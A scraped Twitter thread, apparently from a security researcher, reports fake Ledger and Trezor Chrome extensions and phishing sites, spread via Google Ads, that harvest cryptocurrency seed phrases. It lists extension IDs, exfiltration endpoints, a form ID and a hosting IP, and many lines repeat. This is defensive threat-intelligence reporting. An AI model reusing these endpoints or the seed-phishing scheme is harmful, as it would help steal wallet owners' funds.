
cc: @Ledger @Ledger_Support @googledevs
#cryptocurrency #security #phishing https://twitter.com/sniko_/status/1236346777814601728
Extension ID: pbilbjpkfbfbackdcejdmhdfgeldakkn (6 users)
Asks for seed phrases, posts to backend hosted at ledger[.]productions/api_v1/ (cc: @Cloudflare)
Asks for seed phrases, posts to backend hosted at ledger[.]productions/api_v1/ (cc: @Cloudflare)
Extension ID: lfaahmcgahoalphllknbfcckggddoffj (101 users)
Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Extension ID: dehindejipifeaikcgbkdijgkbjliojc (31 users)
Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Extension ID: bhkcgfbaokmhglgipbppoobmoblcomhh (119 users)
Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Delivered via @GoogleAds again, like the linked tweet in the OP
. @ZDNet coverage of the previous fake extensions - some of these function the same (using GoogleDocs) but some don't - though the are similar
I recommend reading the writeup by @campuscodi in the linked tweet for a full understanding of what's happening https://twitter.com/MyCrypto/status/1236090921373990912
I recommend reading the writeup by @campuscodi in the linked tweet for a full understanding of what's happening https://twitter.com/MyCrypto/status/1236090921373990912

Extension ID: opmelhjohnmenjibglddlpmbpbocohck (~71 users)
Asks for seed phrases, posts to completssl[.]com/ssnd_t.php
Same backend as this Trezor one https://twitter.com/sniko_/status/1243917603745267712
cc: @ChromiumDev @Ledger @Ledger_Support
More @Ledger phishing delivered via @GoogleAds - A website and a Chrome extension
Extension ID: opmelhjohnmenjibglddlpmbpbocohck (see tweet above)
Website: myledgernano[.]com (cc: @Cloudflare)
Sends phished seed phrases to POST /device/init/payload
Extension ID: opmelhjohnmenjibglddlpmbpbocohck (see tweet above)
Website: myledgernano[.]com (cc: @Cloudflare)
Sends phished seed phrases to POST /device/init/payload
173.212.230.221 is hosting suspicious domains (myledgernano[.]com originally pointed here before hiding behind Cloudflare)
Domains targetting @Trezor and @Ledger customers (cc: @Mutex_Lock)
https://pastebin.com/raw/CawRZkyw
Domains targetting @Trezor and @Ledger customers (cc: @Mutex_Lock)
https://pastebin.com/raw/CawRZkyw

Extension ID: mjbimaghobnkobfefccnnnjedoefbafl (~100 users)
Asks for seed phrases, posts to completssl[.]com/ssnd_1.php
Delivered via @GoogleAds
https://twitter.com/sniko_/status/1243946328520118273
cc: @ChromiumDev @Ledger @Ledger_Support
And another fake Ledger extension on the Chrome webstore
Extension ID: ddohdfnenhipnhnbbfifknnhaomihcip (~261 users)
Asks for seeds, posts to usermetrica[.]org/api_v1
cc: @ChromiumDev @Ledger @Ledger_Support
Extension ID: ddohdfnenhipnhnbbfifknnhaomihcip (~261 users)
Asks for seeds, posts to usermetrica[.]org/api_v1
cc: @ChromiumDev @Ledger @Ledger_Support
And another fake Ledger extension on the Chrome webstore
Extension ID: dbcfhcelmjepboabieglhjejeolaopdl (~272 users)
Asks for seeds, posts to usermetrica[.]org/api_v1
cc: @ChromiumDev @Ledger @Ledger_Support
Extension ID: dbcfhcelmjepboabieglhjejeolaopdl (~272 users)
Asks for seeds, posts to usermetrica[.]org/api_v1
cc: @ChromiumDev @Ledger @Ledger_Support
Another fake Ledger extension on the Chrome webstore
Extension ID: mciddpldhpdpibckghnaoidpolnmighk (~535 users)
Asks for seeds, posts to walletbalance[.]org/api_v1/ - though, they've minifed their JS and tried to obfuscate it
cc: @Ledger @Ledger_Support
#malware #bitcoin
Extension ID: mciddpldhpdpibckghnaoidpolnmighk (~535 users)
Asks for seeds, posts to walletbalance[.]org/api_v1/ - though, they've minifed their JS and tried to obfuscate it
cc: @Ledger @Ledger_Support
#malware #bitcoin

Another fake Ledger extension on the Chrome website
Extension ID: agfjbfkpehcnceblmdahjaejpnnnkjdn (~67 users)
Asks for seeds, posts to completssl[.]com/ssnd_1.php
cc: @Ledger @Ledger_Support
#malware #bitcoin
Extension ID: agfjbfkpehcnceblmdahjaejpnnnkjdn (~67 users)
Asks for seeds, posts to completssl[.]com/ssnd_1.php
cc: @Ledger @Ledger_Support
#malware #bitcoin

Another fake Ledger extension on the Chrome website - pushed via Google Ads
Extension ID: mcbcknmlpfkbpogpnfcimfgdmchchmmg (~0 users)
Asks for seeds, posts to usermetrica[.]org/api_v1/
cc: @Ledger @Ledger_Support @ChromiumDev
#malware #bitcoin
Extension ID: mcbcknmlpfkbpogpnfcimfgdmchchmmg (~0 users)
Asks for seeds, posts to usermetrica[.]org/api_v1/
cc: @Ledger @Ledger_Support @ChromiumDev
#malware #bitcoin

I've been quiet on this thread (and similar others) but still we are finding more and issuing takedowns.
A new malicious @Ledger extension has changed and started using Telegram as their c2...
Not the first time we are flooding a c2 - see quoted thread
https://twitter.com/sniko_/status/1202990606638878720
A new malicious @Ledger extension has changed and started using Telegram as their c2...
Not the first time we are flooding a c2 - see quoted thread
https://twitter.com/sniko_/status/1202990606638878720